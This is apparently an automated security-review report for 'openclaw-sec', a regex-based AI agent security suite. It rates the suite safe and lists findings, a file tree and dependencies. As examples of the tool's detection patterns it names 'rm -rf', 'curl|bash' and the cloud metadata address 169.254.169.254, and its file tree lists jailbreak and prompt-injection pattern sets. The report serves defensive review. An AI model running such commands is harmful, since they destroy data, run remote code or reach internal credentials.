Trusted — Risk Score 5/100
openclaw-sec
AI Agent Security Suite - Real-time protection against prompt injection, command injection, SSRF, path traversal, secrets exposure, and content policy violations
This is a legitimate AI agent security validation suite that detects security threats in user input and tool calls using regex pattern matching. All flagged IOCs are test patterns stored in test files for validating the detector's functionality.
Skill Name: openclaw-sec
Duration: 65.6s
Engine: pi
Safe to install
This skill is safe to use. The high-risk brief IOCs are false positives - they exist exclusively in test files as test patterns for the security detector to match against. No malicious behavior was found in the actual implementation.

Findings 3 items

Severity: Info
Finding: Test file pattern contamination
Location: src/**/__tests__/
Pre-scan flagged many IOCs (shell commands, API keys, IPs) but all exist only in test files (*.test.ts) as test patterns for the security detector to match. No actual malicious code exists.
Pattern examples in test files for detector validation
→ No action needed - these are expected test patterns

Severity: Info
Finding: Pattern definition files are legitimate
Location: src/patterns/
The src/patterns/ directory contains regex patterns for detecting malicious inputs (SSRF, command injection, etc.). This is the core function of the security tool.
Detection patterns like 'rm -rf', 'curl|bash', '169.254.169.254'
→ No action needed - these patterns are the security tool's purpose

Severity: Low
Finding: No allowed-tools declaration
Location: SKILL.md
SKILL.md does not explicitly declare filesystem:READ or database:WRITE in allowed-tools. However, actual tool usage matches documented behavior.
No allowed-tools mapping provided
→ Consider adding explicit allowed-tools declaration for transparency

Resource | Declared | Inferred | Status | Evidence
Filesystem | READ | READ | ✓ Aligned | CLI reads config files and optional content files
Network | READ | READ | ✓ Aligned | Notification system sends webhooks when configured, but disabled by default
Database | WRITE | WRITE | ✓ Aligned | better-sqlite3 for local event logging
Shell | NONE | NONE | | No shell execution in implementation

122 findings: 22 Critical, 17 High

File Tree

90 files · 767.3 KB · 25322 lines
TypeScript 78f · 19024L, YAML 3f · 3786L, Markdown 3f · 2394L, JSON 5f · 96L, JavaScript 1f · 22L
├─ 📁 plugins
│ ├─ 📁 security-input-validator-plugin
│ │ ├─ 📜 index.ts TypeScript 129L · 3.6 KB
│ │ ├─ 📜 install.ts TypeScript 69L · 2.4 KB
│ │ └─ 📋 openclaw.plugin.json JSON 16L · 411 B
│ └─ 📁 security-tool-validator-plugin
│   ├─ 📜 index.ts TypeScript 228L · 6.0 KB
│   ├─ 📜 install.ts TypeScript 69L · 2.4 KB
│   └─ 📋 openclaw.plugin.json JSON 16L · 391 B
├─ 📁 src
│ ├─ 📁 __tests__
│ │ ├─ 📁 benchmarks
│ │ │ └─ 📜 performance-benchmark.test.ts TypeScript 831L · 23.8 KB
│ │ └─ 📜 cli.test.ts TypeScript 145L · 4.0 KB
│ ├─ 📁 core
│ │ ├─ 📁 __tests__
│ │ │ ├─ 📜 action-engine.test.ts TypeScript 369L · 12.1 KB
│ │ │ ├─ 📜 async-queue.test.ts TypeScript 557L · 15.0 KB
│ │ │ ├─ 📜 config-manager.test.ts TypeScript 178L · 4.8 KB
│ │ │ ├─ 📜 database-manager.test.ts TypeScript 405L · 12.4 KB
│ │ │ ├─ 📜 logger.test.ts TypeScript 357L · 10.5 KB
│ │ │ ├─ 📜 notification-system.test.ts TypeScript 472L · 14.5 KB
│ │ │ ├─ 📜 security-engine.test.ts TypeScript 401L · 11.6 KB
│ │ │ └─ 📜 severity-scorer.test.ts TypeScript 230L · 8.3 KB
│ │ ├─ 📜 action-engine.ts TypeScript 175L · 5.3 KB
│ │ ├─ 📜 async-queue.ts TypeScript 194L · 4.7 KB
│ │ ├─ 📜 config-manager.ts TypeScript 181L · 5.5 KB
│ │ ├─ 📜 database-manager.ts TypeScript 600L · 18.9 KB
│ │ ├─ 📜 logger.ts TypeScript 293L · 7.2 KB
│ │ ├─ 📜 notification-system.ts TypeScript 402L · 10.2 KB
│ │ ├─ 📜 security-engine.ts TypeScript 583L · 19.8 KB
│ │ └─ 📜 severity-scorer.ts TypeScript 159L · 4.3 KB
│ ├─ 📁 hooks
│ │ └─ 📜 hooks.ts TypeScript 98L · 1.8 KB
│ ├─ 📁 modules
│ │ ├─ 📁 code-execution-detector
│ │ │ ├─ 📁 __tests__
│ │ │ │ └─ 📜 detector.test.ts TypeScript 228L · 8.2 KB
│ │ │ └─ 📜 detector.ts TypeScript 64L · 1.7 KB
│ │ ├─ 📁 command-validator
│ │ │ ├─ 📁 __tests__
│ │ │ │ └─ 📜 validator.test.ts TypeScript 280L · 10.2 KB
│ │ │ └─ 📜 validator.ts TypeScript 64L · 1.7 KB
│ │ ├─ 📁 content-scanner
│ │ │ ├─ 📁 __tests__
│ │ │ │ └─ 📜 scanner.test.ts TypeScript 471L · 17.0 KB
│ │ │ └─ 📜 scanner.ts TypeScript 98L · 3.1 KB
│ │ ├─ 📁 exfiltration-detector
│ │ │ ├─ 📁 __tests__
│ │ │ │ └─ 📜 detector.test.ts TypeScript 186L · 6.6 KB
│ │ │ └─ 📜 detector.ts TypeScript 64L · 1.8 KB
│ │ ├─ 📁 injection-validator
│ │ │ ├─ 📁 __tests__
│ │ │ │ └─ 📜 validator.test.ts TypeScript 189L · 6.7 KB
│ │ │ └─ 📜 validator.ts TypeScript 64L · 1.7 KB
│ │ ├─ 📁 path-validator
│ │ │ ├─ 📁 __tests__
│ │ │ │ └─ 📜 validator.test.ts TypeScript 507L · 17.9 KB
│ │ │ └─ 📜 validator.ts TypeScript 71L · 2.0 KB
│ │ ├─ 📁 prompt-injection
│ │ │ ├─ 📁 __tests__
│ │ │ │ └─ 📜 detector.test.ts TypeScript 127L · 4.3 KB
│ │ │ └─ 📜 detector.ts TypeScript 66L · 1.7 KB
│ │ ├─ 📁 secret-detector
│ │ │ ├─ 📁 __tests__
│ │ │ │ └─ 📜 detector.test.ts TypeScript 652L · 23.9 KB
│ │ │ └─ 📜 detector.ts TypeScript 87L · 2.6 KB
│ │ ├─ 📁 serialization-detector
│ │ │ ├─ 📁 __tests__
│ │ │ │ └─ 📜 detector.test.ts TypeScript 208L · 7.6 KB
│ │ │ └─ 📜 detector.ts TypeScript 64L · 1.7 KB
│ │ └─ 📁 url-validator
│ │   ├─ 📁 __tests__
│ │   │ └─ 📜 validator.test.ts TypeScript 388L · 13.4 KB
│ │   └─ 📜 validator.ts TypeScript 97L · 2.7 KB
│ ├─ 📁 patterns
│ │ ├─ 📁 obfuscation
│ │ │ └─ 📜 obfuscation-patterns.ts TypeScript 334L · 9.7 KB
│ │ ├─ 📁 prompt-injection
│ │ │ ├─ 📜 cot-hijacking-zh.ts TypeScript 170L · 5.7 KB
│ │ │ ├─ 📜 cot-hijacking.ts TypeScript 173L · 6.1 KB
│ │ │ ├─ 📜 direct-extraction-zh.ts TypeScript 380L · 12.0 KB
│ │ │ ├─ 📜 direct-extraction.ts TypeScript 200L · 6.2 KB
│ │ │ ├─ 📜 encoding-obfuscation-zh.ts TypeScript 150L · 4.1 KB
│ │ │ ├─ 📜 encoding-obfuscation.ts TypeScript 110L · 3.2 KB
│ │ │ ├─ 📜 extraction-attacks-zh.ts TypeScript 183L · 5.4 KB
│ │ │ ├─ 📜 extraction-attacks.ts TypeScript 186L · 5.8 KB
│ │ │ ├─ 📜 index.ts TypeScript 46L · 2.0 KB
│ │ │ ├─ 📜 instruction-override-zh.ts TypeScript 309L · 10.0 KB
│ │ │ ├─ 📜 instruction-override.ts TypeScript 125L · 4.5 KB
│ │ │ ├─ 📜 jailbreak-attempts-zh.ts TypeScript 326L · 9.5 KB
│ │ │ ├─ 📜 jailbreak-attempts.ts TypeScript 232L · 7.4 KB
│ │ │ ├─ 📜 policy-puppetry-zh.ts TypeScript 176L · 5.3 KB
│ │ │ ├─ 📜 policy-puppetry.ts TypeScript 179L · 5.5 KB
│ │ │ ├─ 📜 role-manipulation-zh.ts TypeScript 100L · 3.4 KB
│ │ │ ├─ 📜 role-manipulation.ts TypeScript 56L · 1.9 KB
│ │ │ ├─ 📜 social-engineering-zh.ts TypeScript 404L · 12.1 KB
│ │ │ ├─ 📜 social-engineering.ts TypeScript 236L · 7.1 KB
│ │ │ ├─ 📜 system-impersonation-zh.ts TypeScript 87L · 2.6 KB
│ │ │ └─ 📜 system-impersonation.ts TypeScript 56L · 1.8 KB
│ │ ├─ 📁 runtime-validation
│ │ │ ├─ 📜 code-execution-patterns.ts TypeScript 237L · 7.5 KB
│ │ │ ├─ 📜 command-injection.ts TypeScript 256L · 8.0 KB
│ │ │ ├─ 📜 exfiltration-patterns.ts TypeScript 137L · 4.8 KB
│ │ │ ├─ 📜 injection-patterns.ts TypeScript 190L · 5.7 KB
│ │ │ ├─ 📜 path-traversal-patterns.ts TypeScript 277L · 7.9 KB
│ │ │ ├─ 📜 serialization-patterns.ts TypeScript 200L · 6.3 KB
│ │ │ ├─ 📜 sql-injection-patterns.ts TypeScript 170L · 5.1 KB
│ │ │ ├─ 📜 ssrf-patterns.ts TypeScript 273L · 8.7 KB
│ │ │ └─ 📜 template-injection-patterns.ts TypeScript 157L · 4.8 KB
│ │ └─ 📁 secrets
│ │   └─ 🔑 secret-patterns.ts TypeScript 582L · 16.3 KB
│ ├─ 📁 types
│ │ └─ 📜 index.ts TypeScript 112L · 2.5 KB
│ └─ 📜 cli.ts TypeScript 801L · 24.7 KB
├─ 📁 tests
│ └─ 📜 zeroleaks-pentest.ts TypeScript 314L · 11.4 KB
├─ 📋 _meta.json JSON 5L · 131 B
├─ 📋 .openclaw-sec.example.yaml YAML 107L · 2.8 KB
├─ 📋 config.example.yaml YAML 80L · 1.7 KB
├─ 📝 CONTRIBUTING.md Markdown 350L · 7.7 KB
├─ 📜 jest.config.js JavaScript 22L · 454 B
├─ 📋 package.json JSON 39L · 1023 B
├─ 📋 pnpm-lock.yaml YAML 3599L · 115.9 KB
├─ 📝 README.md Markdown 1014L · 22.9 KB
├─ 📝 SKILL.md Markdown 1030L · 23.3 KB
└─ 📋 tsconfig.json JSON 20L · 477 B

Dependencies 3 items

Package | Version | Source | Known Vulns | Notes
better-sqlite3 | ^12.6.2 | npm | No | SQLite driver for local database only
commander | ^14.0.3 | npm | No | CLI framework
yaml | ^2.8.2 | npm | No | Config file parsing

Security Positives

✓ Clean implementation - no shell execution, no credential harvesting, no C2 communication
✓ Uses SQLite for local-only storage (better-sqlite3) - no remote database
✓ Notification system is disabled by default and requires explicit configuration
✓ Pattern matching is purely read-only analysis - no code execution
✓ Well-structured TypeScript with proper error handling
✓ Plugin system validates input without modifying agent behavior
✓ Async database writes don't block validation
✓ Comprehensive test coverage for detection accuracy